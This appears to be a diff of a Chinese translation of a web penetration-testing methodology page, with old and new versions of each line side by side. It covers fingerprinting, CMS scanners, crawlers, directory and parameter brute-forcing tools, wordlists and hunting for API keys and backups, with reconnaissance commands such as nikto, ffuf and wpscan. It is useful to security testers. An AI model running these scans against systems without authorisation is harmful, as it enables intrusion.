PORT STATE SERVICE
80/tcp open http
@ -35,44 +36,44 @@ PORT STATE SERVICE
nc -v domain.com 80 # GET / HTTP/1.0
openssl s_client -connect domain.com:443 # GET / HTTP/1.0
```
### Web API 指南
### Web API Guidance
{% content-ref url="web-api-pentesting.md" %}
[web-api-pentesting.md](web-api-pentesting.md)
{% endcontent-ref %}
## 方法概述
## Methodology summary
> 在这个方法论中,我们假设您将攻击一个域名或子域名仅限于此。因此您应该将此方法应用于发现的每个域、子域或IP其中包含未确定的Web服务器
> 在这个方法论中,我们假设你将攻击一个域或子域仅此而已。因此你应该将此方法论应用于每个发现的域、子域或具有不确定网络服务器的IP
* [ ] 从**识别**Web服务器使用的**技术**开始。寻找在测试的其余部分中要记住的**技巧**,如果您能成功识别该技术。
* [ ] 该技术版本是否存在任何**已知漏洞**
* [ ] 使用任何**众所周知的技术**?有任何**有用的技巧**来提取更多信息吗
* [ ] 是否有任何**专门的扫描工具**可供运行如wpscan
* [ ] 启动**通用目的扫描工具**。您永远不知道它们是否会找到某些内容或者是否会发现一些有趣的信息。
* [ ] 首先**识别**网络服务器使用的**技术**。寻找**技巧**,以便在测试的其余部分中牢记,如果你能成功识别技术。
* [ ] 该技术版本是否任何**已知漏洞**
* [ ] 使用任何**知名技术**?有没有**有用的技巧**来提取更多信息
* [ ] 是否有任何**专业扫描器**可以运行如wpscan
* [ ] 启动**通用扫描器**。你永远不知道它们是否会发现某些东西或找到一些有趣的信息。
* [ ] 从**初始检查**开始:**robots**、**sitemap**、**404**错误和**SSL/TLS扫描**如果是HTTPS
* [ ] 开始**爬取**网页:现在是时候**查找**所有可能的**文件、文件夹**和**正在使用的参数**。还要检查**特殊发现**。
* [ ] _注意,每当在暴力破解或爬取过程中发现新目录时,应该对其进行爬取。_
* [ ] **目录暴力破解**:尝试对所有发现的文件夹进行暴力破解,以寻找新的**文件**和**目录**。
* [ ] _注意,每当在暴力破解或爬取过程中发现新目录时,应该对其进行暴力破解。_
* [ ] **备份检查**:测试是否可以找到**发现文件**的**备份**,附加常见的备份扩展名
* [ ] 开始**爬取**网页:是时候**查找**所有可能的**文件、文件夹**和**使用的参数**。同时,检查**特殊发现**。
* [ ] _注意在暴力破解或爬取过程中发现新目录时应进行爬取。_
* [ ] **目录暴力破解**:尝试暴力破解所有发现的文件夹,寻找新的**文件**和**目录**。
* [ ] _注意在暴力破解或爬取过程中发现新目录时应进行暴力破解。_
* [ ] **备份检查**:测试是否可以通过附加常见备份扩展名找到**发现文件**的**备份**。
* [ ] **暴力破解参数**:尝试**查找隐藏参数**。
* [ ] 一旦您已经**识别**了所有可能接受**用户输入**的**端点**,请检查与之相关的各种**漏洞**。
* [ ] [按照此清单操作](../../pentesting-web/web-vulnerabilities-methodology.md)
* [ ] 一旦你**识别**了所有可能接受**用户输入**的**端点**,检查与之相关的所有类型的**漏洞**。
* [ ] [遵循此检查清单](../../pentesting-web/web-vulnerabilities-methodology.md)
## 服务器版本(存在漏洞吗?)
## Server Version (Vulnerable?)
### 识别
### Identify
检查运行的服务器**版本**是否存在**已知漏洞**。\
**响应的HTTP标头和Cookie**可能非常有用,可用于**识别**正在使用的**技术**和/或**版本**。**Nmap扫描**可以识别服务器版本,但也可以使用工具[**whatweb**](https://github.com/urbanadventurer/WhatWeb)**、**[**webtech**](https://github.com/ShielderSec/webtech)或[**https://builtwith.com/**](https://builtwith.com)****
检查正在运行的服务器**版本**是否存在**已知漏洞**。\
**HTTP响应的头部和cookie**可能非常有用,以**识别**所使用的**技术**和/或**版本**。**Nmap扫描**可以识别服务器版本,但工具[**whatweb**](https://github.com/urbanadventurer/WhatWeb)**、**[**webtech**](https://github.com/ShielderSec/webtech)或[**https://builtwith.com/**](https://builtwith.com)**也可能有用**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
webanalyze -host https://google.com -crawl 2
```
搜索**Web应用程序的漏洞版本**
Search **for** [**web应用程序的漏洞版本**](../../generic-methodologies-and-resources/search-exploits.md)
### **检查是否有WAF**
@ -80,9 +81,9 @@ webanalyze -host https://google.com -crawl 2
* [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
* [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
### Web技巧
### Web技术技
一些用于发现不同知名**技术**中的漏洞的**技巧**
一些**技巧**用于**查找不同知名技术**中的**漏洞**
* [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
* [**Apache**](apache.md)
@ -94,8 +95,8 @@ webanalyze -host https://google.com -crawl 2
* [**Git**](git.md)
* [**Golang**](golang.md)
* [**GraphQL**](graphql.md)
* [**H2 - Java SQL database**](h2-java-sql-database.md)
* [**IIS tricks**](iis-internet-information-services.md)
* [**H2 - Java SQL数据库**](h2-java-sql-database.md)
* [**IIS技巧**](iis-internet-information-services.md)
* [**JBOSS**](jboss.md)
* [**Jenkins**](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md)
* [**Jira**](jira.md)
@ -104,7 +105,7 @@ webanalyze -host https://google.com -crawl 2
* [**Laravel**](laravel.md)
* [**Moodle**](moodle.md)
* [**Nginx**](nginx.md)
* [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/)
* [**PHPphp有很多有趣的技巧可以被利用**](php-tricks-esp/)
* [**Python**](python.md)
* [**Spring Actuators**](spring-actuators.md)
* [**Symphony**](symphony.md)
@ -114,21 +115,21 @@ webanalyze -host https://google.com -crawl 2
* [**WebDav**](put-method-webdav.md)
* [**Werkzeug**](werkzeug.md)
* [**Wordpress**](wordpress.md)
* [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/)
* [**Electron Desktop (XSSRCE)**](electron-desktop-apps/)
_请注意**同一域**可能在不同**端口**、**文件夹**和**子域**中使用**不同的技术**。_\
如果Web应用程序正在使用之前列出的任何知名**技术/平台**或**其他任何技术**,请不要忘记在互联网上**搜索新技巧**(并告诉我!)。
_请注意**同一域**可能在不同**端口**、**文件夹**和**子域**中使用**不同的技术**。_\
如果web应用程序使用任何知名的**技术/平台**或**其他任何技术**,请不要忘记**在互联网上搜索**新技巧(并告诉我!)。
### 源代码审查
如果应用程序的**源代码**在**github**上可用,除了自行对应用程序进行**白盒测试**外,还有一些信息对当前的**黑盒测试**可能会**有用**
如果应用程序的**源代码**在**github**上可用,除了进行**自己的白盒测试**外,还有**一些信息**可能对当前的**黑盒测试**是**有用的**
* 是否有**变更日志、自述文件或版本**文件或任何通过Web访问的**版本信息**
* 凭据是如何保存的?是否有(可访问的)带有凭据(用户名或密码)的**文件**
* 密码是**明文**、**加密**还是使用了哪种**哈希算法**
* 是否使用任何用于加密的**主密钥**?使用了哪种**算法**
* 您能否利用某些漏洞**访问这些文件**
* 在github的已解决和未解决的**问题**中是否有任何**有趣的信息**?或在**提交历史**中(也许在旧提交中**引入了某些密码**
* 是否有**变更日志或自述文件或版本**文件或任何带有**版本信息的可通过网络访问的内容
* **凭据**是如何保存的?是否有任何(可访问的?)**文件**包含凭据(用户名或密码)
* **密码**是**明文**、**加密**还是使用了哪种**哈希算法**
* 是否使用任何**主密钥**来加密某些内容?使用了哪种**算法**
* 你能否通过利用某个漏洞**访问这些文件**
* 在github中是否有任何**有趣信息**(已解决和未解决的)**问题**?或在**提交历史**中(也许某个**密码在旧提交中引入**
{% content-ref url="code-review-tools.md" %}
[code-review-tools.md](code-review-tools.md)
@ -136,7 +137,7 @@ _请注意**同一域**可能在不同**端口**、**文件夹**和**子域**
### 自动扫描器
#### 通用用途的自动扫描器
#### 通用自动扫描器
```bash
nikto -h <URL>
whatweb -a 4 <URL>
@ -148,60 +149,60 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### CMS扫描器
#### CMS 扫描器
如果使用了CMS不要忘记**运行扫描器**,也许会发现一些有趣的东西
如果使用了 CMS不要忘记 **运行扫描器**,也许会发现一些有价值的信息
[**Clusterd**](https://github.com/hatRiot/clusterd)**** [**JBoss**](jboss.md)**ColdFusionWebLogic** [**Tomcat**](tomcat/)**RailoAxis2Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan):对[**WordPress**](wordpress.md)[**Drupal**](drupal/)**Joomla****vBulletin**网站进行安全问题扫描(图形界面)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**** 对[**Joomla**](joomla.md)**** [**Wordpress**](wordpress.md)**** [**Drupal**](drupal/)**PrestaShopOpencart**进行扫描\
**CMSMap**:对[**(W)ordpress**](wordpress.md)**** [**(J)oomla**](joomla.md)**** [**(D)rupal**](drupal/) **或** [**(M)oodle**](moodle.md)进行扫描\
[**droopscan**](https://github.com/droope/droopescan)**** 对[**Drupal**](drupal/)**** [**Joomla**](joomla.md)**** [**Moodle**](moodle.md)**Silverstripe** [**Wordpress**](wordpress.md)进行扫描
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** 网站的安全问题。 (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **或** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
```bash
cmsmap [-f W] -F -d <URL>
wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> 到这一步,您应该已经获得了客户端使用的 Web 服务器的一些信息(如果提供了任何数据),以及在测试过程中要牢记的一些技巧。如果幸运的话,您甚至可能已经找到了一个 CMS 并运行了一些扫描器。
> 在这一点上您应该已经获得了一些关于客户使用的网络服务器的信息如果提供了任何数据以及在测试期间需要记住的一些技巧。如果您运气好您甚至找到了一个CMS并运行了一些扫描器。
## 逐步 Web 应用程序发现
## 逐步网络应用发现
> 从这一点开始,我们将开始与 Web 应用程序进行交互。
> 从这一点开始,我们将开始与网络应用程序进行交互。
### 初始检查
**具有有趣信息的默认页面:**
**包含有趣信息的默认页面:**
* /robots.txt
* /sitemap.xml
* /crossdomain.xml
* /clientaccesspolicy.xml
* /.well-known/
* 还要检查主要和次要页面中的注释
* 还要检查主页面和次级页面中的评论
**强制错误**
当向 Web 服务器发送奇怪的数据时,Web 服务器可能会**出意外行为**。这可能会打开**漏洞**或**泄露敏感信息**。
当向Web服务器发送奇怪的数据时可能会**表现出意外行为**。这可能会打开**漏洞**或**泄露敏感信息**。
* 访问像 /whatever_fake.php (.aspx, .html, .etc) 这样的**虚假页面**
* 在**cookie 值**和**参数值**中添加 "\[]", "]]" 和 "\[\[" 以创建错误
* 通过在**URL**的**末尾**输入 **`/~randomthing/%s`** 生成错误
* 尝试使用**不同的 HTTP 动词**如 PATCH、DEBUG 或错误的 FAKE
* 访问**假页面**如 /whatever\_fake.php (.aspx,.html,.etc)
* 在**cookie值**和**参数**值中**添加 "\[]", "]]", 和 "\[\["**以创建错误
* 通过在**URL**的**末尾**提供输入为**`/~randomthing/%s`**来生成错误
* 尝试**不同的HTTP动词**如 PATCH、DEBUG 或错误的 FAKE
#### **检查是否可以上传文件(**[**PUT 动词WebDav**](put-method-webdav.md)****
#### **检查是否可以上传文件(**[**PUT动词WebDav**](put-method-webdav.md)****
如果发现**WebDav**已**启用**但您没有足够的权限在根文件夹中**上传文件**,请尝试:
如果发现**WebDav**已**启用**但您没有足够的权限在根文件夹中**上传文件**,请尝试:
* **暴力破解**凭据
* 通过 WebDav**上传文件**到 Web 页面内**找到的其他文件夹**。您可能有权限在其他文件夹中上传文件。
* 通过WebDav将**文件上传**到网页中**找到的其他文件夹**。您可能有权限在其他文件夹中上传文件。
### **SSL/TLS 漏洞**
### **SSL/TLS漏洞**
* 如果应用程序在任何部分**没有强制使用 HTTPS**,那么它**容易受到中间人攻击**
* 如果应用程序**使用 HTTP 发送敏感数据(密码)**。那么这是一个高漏洞。
* 如果应用程序在任何部分**不强制用户使用HTTPS**,那么它**容易受到中间人攻击MitM**
* 如果应用程序**使用HTTP发送敏感数据密码**,那么这是一个高风险漏洞。
使用 [**testssl.sh**](https://github.com/drwetter/testssl.sh) 检查**漏洞**(在 Bug Bounty 程序中,这类漏洞可能不会被接受),并使用 [**a2sv**](https://github.com/hahwul/a2sv) 重新检查漏洞:
使用[**testssl.sh**](https://github.com/drwetter/testssl.sh)检查**漏洞**(在漏洞赏金计划中,这类漏洞可能不会被接受),并使用[**a2sv**](https://github.com/hahwul/a2sv)重新检查漏洞:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
@ -210,68 +211,68 @@ joomlavs.rb #https://github.com/rastating/joomlavs
sslscan <host:port>
sslyze --regular <ip:port>
```
SSL/TLS漏洞信息
关于SSL/TLS漏洞信息:
- [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
- [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
* [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
* [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
### 爬虫
在网络中启动某种**爬虫**。爬虫的目标是从被测试应用程序中**找到尽可能多的路径**。因此,应使用网络爬行和外部来源来找到尽可能多的有效路径。
在网络中启动某种**爬虫**。爬虫的目标是**尽可能多地找到**被测试应用程序的路径。因此,应使用网络爬虫和外部资源来找到尽可能多的有效路径。
- [**gospider**](https://github.com/jaeles-project/gospider) (go)HTML爬虫JS文件中的LinkFinder和外部来源Archive.orgCommonCrawl.orgVirusTotal.comAlienVault.com
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go)HML爬虫带有JS文件和Archive.org的LinkFider作为外部来源。
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python)HTML爬虫还指示“juicy files”。
- [**evine**](https://github.com/saeeddhqan/evine) (go)交互式CLI HTML爬虫。它还在Archive.org中搜索。
- [**meg**](https://github.com/tomnomnom/meg) (go)这个工具不是爬虫但很有用。您只需指定一个带有主机和路径的文件meg将在每个主机上获取每个路径并保存响应。
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go)带有JS渲染功能的HTML爬虫。但是看起来它没有维护预编译版本过时,当前代码无法编译。
- [**gau**](https://github.com/lc/gau) (go)使用外部提供者waybackotxcommoncrawl的HTML爬虫。
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider):此脚本将查找带有参数的URL并列出它们。
- [**galer**](https://github.com/dwisiswant0/galer) (go)带有JS渲染功能的HTML爬虫。
- [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python)HTML爬虫具有JS美化功能能够在JS文件中搜索新路径。还值得一看[JSScanner](https://github.com/dark-warlord14/JSScanner)它是LinkFinder的包装器。
- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go)用于提取HTML源代码和嵌入式javascript文件中的端点。对于漏洞猎人、红队人员、信息安全专家很有用。
- [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7)使用Tornado和JSBeautifier从JavaScript文件中解析相对URL的Python 2.7脚本。用于轻松发现AJAX请求。看起来没有维护。
- [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby)给定一个文件HTML它将使用巧妙的正则表达式从中提取URL以查找并提取丑陋压缩文件中的相对URL。
- [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash多个工具)使用多个工具从JS文件中收集有趣的信息。
- [**subjs**](https://github.com/lc/subjs) (go)查找JS文件。
- [**page-fetch**](https://github.com/detectify/page-fetch) (go)在无头浏览器中加载页面并打印加载的所有URL以加载页面
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust):混合了前述工具的几个选项的内容发现工具
- [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions)用于在JS文件中查找路径和参数的Burp扩展
- [**Sourcemapper**](https://github.com/denandz/sourcemapper):给定.js.map URL将获取到美化的JS代码。
- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder)这是一个用于发现给定目标的端点的工具。
- [**waymore**](https://github.com/xnl-h4ck3r/waymore)从wayback机器中发现链接还下载wayback中的响应并查找更多链接)。
- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go):爬行(甚至通过填写表单)并使用特定的正则表达式查找敏感信息。
- [**SpiderSuite**](https://github.com/3nock/SpiderSuite)Spider Suite是一款专为网络安全专业人员设计的高级多功能GUI网络安全爬虫/蜘蛛
- [**jsluice**](https://github.com/BishopFox/jsluice) (go)这是一个用于从JavaScript源代码中提取URL、路径、秘密和其他有趣数据的Go包和[命令行工具](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice)。
- [**ParaForge**](https://github.com/Anof-cyber/ParaForge)ParaForge是一个简单的**Burp Suite扩展**,用于从请求中提取参数和端点,以创建用于模糊测试和枚举的自定义字典
- [**katana**](https://github.com/projectdiscovery/katana) (go):这是一个很棒的工具
* [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML爬虫JS文件中的LinkFinder和外部资源Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com
* [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML爬虫带有JS文件的LinkFinder和Archive.org作为外部资源。
* [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML爬虫也指示“美味文件”。
* [**evine** ](https://github.com/saeeddhqan/evine)(go): 交互式CLI HTML爬虫。它还在Archive.org中搜索。
* [**meg**](https://github.com/tomnomnom/meg) (go): 该工具不是爬虫但可能有用。您只需指示一个包含主机的文件和一个包含路径的文件meg将获取每个主机上的每个路径并保存响应。
* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): 带有JS渲染功能的HTML爬虫。然而它似乎没有维护预编译版本较旧,当前代码无法编译。
* [**gau**](https://github.com/lc/gau) (go): 使用外部提供者wayback, otx, commoncrawl的HTML爬虫。
* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): 该脚本将找到带参数的URL并列出它们。
* [**galer**](https://github.com/dwisiswant0/galer) (go): 带有JS渲染功能的HTML爬虫。
* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML爬虫具有JS美化功能能够在JS文件中搜索新路径。查看[JSScanner](https://github.com/dark-warlord14/JSScanner)也可能值得它是LinkFinder的一个包装器。
* [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): 提取HTML源代码和嵌入的JavaScript文件中的端点。对漏洞猎人、红队员、信息安全专家有用。
* [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): 一个使用Tornado和JSBeautifier从JavaScript文件中解析相对URL的Python 2.7脚本。对轻松发现AJAX请求很有用。看起来没有维护。
* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): 给定一个文件HTML它将使用巧妙的正则表达式从丑陋压缩文件中提取相对URL。
* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, 多个工具): 使用多个工具从JS文件中收集有趣的信息。
* [**subjs**](https://github.com/lc/subjs) (go): 查找JS文件。
* [**page-fetch**](https://github.com/detectify/page-fetch) (go): 在无头浏览器中加载页面并打印出加载页面的所有URL
* [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): 内容发现工具,结合了之前工具的多个选项
* [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): 一个Burp扩展用于查找JS文件中的路径和参数
* [**Sourcemapper**](https://github.com/denandz/sourcemapper): 一个工具,给定.js.map URL将获取美化的JS代码。
* [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): 这是一个用于发现给定目标的端点的工具。
* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** 从时光机发现链接(还下载时光机中的响应并寻找更多链接)。
* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): 爬取(甚至通过填写表单)并使用特定正则表达式查找敏感信息。
* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite是一个高级多功能GUI网络安全爬虫/蜘蛛,专为网络安全专业人员设计
* [**jsluice**](https://github.com/BishopFox/jsluice) (go): 这是一个Go包和[命令行工具](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice)用于从JavaScript源代码中提取URL、路径、秘密和其他有趣的数据
* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge是一个简单的**Burp Suite扩展**,用于**提取请求中的参数和端点**以创建自定义字典进行模糊测试和枚举
* [**katana**](https://github.com/projectdiscovery/katana) (go): 这个工具很棒
### 暴力破解目录和文件
从根文件夹开始**暴力破解**,确保**暴力破解所有**通过**此方法找到的目录**以及**爬虫**发现的所有目录(您可以**递归**进行此暴力破解,并在使用的字典的开头添加找到的目录的名称)。\
从根文件夹开始**暴力破解**,确保使用**此方法**暴力破解**所有**找到的**目录**以及**爬虫**发现的所有目录(您可以递归地进行此暴力破解,并在使用的字典开头附加找到的目录名称)。\
工具:
- **Dirb** / **Dirbuster** - 包含在Kali中**旧的**(和**慢**)但功能齐全。允许自动签名证书和递归搜索。与其他选项相比太慢。
- [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**它不允许自动签名证书,但**允许递归搜索。
- [**Gobuster**](https://github.com/OJ/gobuster) (go):允许自动签名证书,**不支持**递归搜索。
- [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- 快速,支持递归搜索。**
- [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
- [**ffuf** ](https://github.com/ffuf/ffuf)- 快速:`ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
- [**uro**](https://github.com/s0md3v/uro) (python)这不是一个爬虫而是一个工具给定找到的URL列表将删除“重复”的URL。
- [**Scavenger**](https://github.com/0xDexter0us/Scavenger)Burp扩展从不同页面的burp历史中创建目录列表
- [**TrashCompactor**](https://github.com/michael1026/trashcompactor)删除具有重复功能的URL基于js导入
- [**Chamaleon**](https://github.com/iustin24/chameleon)它使用wapalyzer来检测使用的技术并选择要使用的字典。
* **Dirb** / **Dirbuster** - 包含在Kali中**旧**(和**慢**)但功能正常。允许自动签名证书和递归搜索。与其他选项相比太慢。
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: 它不允许自动签名证书,但**允许递归搜索。
* [**Gobuster**](https://github.com/OJ/gobuster) (go): 它允许自动签名证书,但**没有****递归**搜索。
* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- 快速,支持递归搜索。**
* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
* [**ffuf** ](https://github.com/ffuf/ffuf)- 快速: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
* [**uro**](https://github.com/s0md3v/uro) (python): 这不是一个爬虫而是一个工具给定找到的URL列表将删除“重复”的URL。
* [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp扩展从不同页面的burp历史中创建目录列表
* [**TrashCompactor**](https://github.com/michael1026/trashcompactor): 删除具有重复功能的URL基于js导入
* [**Chamaleon**](https://github.com/iustin24/chameleon): 它使用wapalyzer检测使用的技术并选择要使用的字典。
**推荐字典:**
- [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt)
- [**Dirsearch** 包含的字典](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
- [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
- [Assetnote wordlists](https://wordlists.assetnote.io)
- [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
- raft-large-directories-lowercase.txt
- directory-list-2.3-medium.txt
- RobotsDisallowed/top10000.txt
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt)
* [**Dirsearch** 包含的字典](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [Assetnote字典](https://wordlists.assetnote.io)
* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
* raft-large-directories-lowercase.txt
* directory-list-2.3-medium.txt
* RobotsDisallowed/top10000.txt
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
@ -281,82 +282,83 @@ SSL/TLS漏洞信息
* _/usr/share/wordlists/dirb/big.txt_
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_注意,每当在暴力破解或爬虫过程中发现新目录时应进行暴力破解。_
_注意在暴力破解或爬虫过程中发现新目录时应进行暴力破解。_
### 每个找到的文件要检查的内容
### 检查每个找到的文件
* [**损坏链接检查器**](https://github.com/stevenvachon/broken-link-checker)查找HTML中的损坏链接可能容易被接管
* **文件备份**:找到所有文件后,查找所有可执行文件的备份("_.php_""_.aspx_"...。备份的常见变体包括_file.ext\~_#file.ext#\~file.extfile.ext.bakfile.ext.tmpfile.ext.oldfile.bakfile.tmp和file.old。您还可以使用工具[**bfac**](https://github.com/mazen160/bfac) **或** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)
* **发现新参数**:您可以使用诸如[**Arjun**](https://github.com/s0md3v/Arjun)、[**parameth**](https://github.com/maK-/parameth)、[**x8**](https://github.com/sh1yo/x8) **和** [**Param Miner**](https://github.com/PortSwigger/param-miner) **等工具来发现隐藏参数。如果可以的话您可以尝试在每个可执行的Web文件上搜索**隐藏参数。
* _Arjun所有默认字典_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
* _Param-miner“params”_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
* _Assetnote“parameters_top_1m”_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io)
* _nullenc0de“params.txt”_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
* **注释**:检查所有文件的注释,您可以找到**凭证**或**隐藏功能**。
* 如果您在进行**CTF**比赛,一个“常见”的技巧是在页面的**右侧**的注释中**隐藏**信息(使用**大量**的**空格**,这样如果您使用浏览器打开源代码,您就看不到数据)。另一种可能性是使用**多个新行**,并在网页底部的注释中**隐藏信息**。
* **API密钥**:如果您**找到任何API密钥**,有指南指示如何使用不同平台的API密钥[**keyhacks**](https://github.com/streaak/keyhacks)、[**zile**](https://github.com/xyele/zile.git)、[**truffleHog**](https://github.com/trufflesecurity/truffleHog)、[**SecretFinder**](https://github.com/m4ll0k/SecretFinder)、[**RegHex**](https://github.com/l4yton/RegHex)、[**DumpsterDive**](https://github.com/securing/DumpsterDiver)、[**EarlyBird**](https://github.com/americanexpress/earlybird)
* Google API密钥:如果您找到类似**AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik的API密钥您可以使用项目[**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner)来检查密钥可以访问哪些API。
* **S3存储桶**:在爬行过程中查看是否有任何子域或任何链接与某个**S3存储桶**相关。在这种情况下,[**检查**存储桶的**权限**](buckets/)。
* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): 查找可能容易被接管的HTML中的断开链接。
* **文件备份**: 一旦找到所有文件,查找所有可执行文件的备份("_.php_", "_.aspx_"...。备份命名的常见变体有_file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp和file.old._ 您还可以使用工具[**bfac**](https://github.com/mazen160/bfac) **或** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
* **发现新参数**: 您可以使用工具如[**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **和** [**Param Miner**](https://github.com/PortSwigger/param-miner) **来发现隐藏参数。如果可以您可以尝试在每个可执行的Web文件中搜索**隐藏参数。
